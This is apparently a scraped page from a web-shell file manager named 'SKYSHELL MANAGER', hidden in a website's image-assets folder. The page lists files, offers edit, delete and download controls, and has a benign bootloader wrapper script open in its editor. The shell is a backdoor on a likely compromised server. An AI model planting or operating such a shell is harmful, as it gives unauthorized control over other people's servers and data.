📁
SKYSHELL MANAGER-
🛒
PHP v7.4.33
Create Folder
Create File
Current Path:
home
/
oshofree
/
public_html
/
ads
/
assets
/
images
/
Great-Features
/
Name
Size
Permissions
Actions
📁
..
-
0755
🗑️
🔒
📄
config.php
7.06 KB
0444
🗑️
⬇️
✏️
🔒
📄
error_log
19376.43 KB
0644
🗑️
⬇️
✏️
🔒
Editing: grubby
#!/bin/bash if [[ -x /usr/libexec/grubby/grubby-bls ]] ; then exec /usr/libexec/grubby/grubby-bls "${@}" elif [[ -x /usr/libexec/grubby/grubby ]] ; then exec /usr/libexec/grubby/grubby "${@}" fi echo "Grubby is not installed correctly." >>/dev/stderr exit 1
💾 Save Changes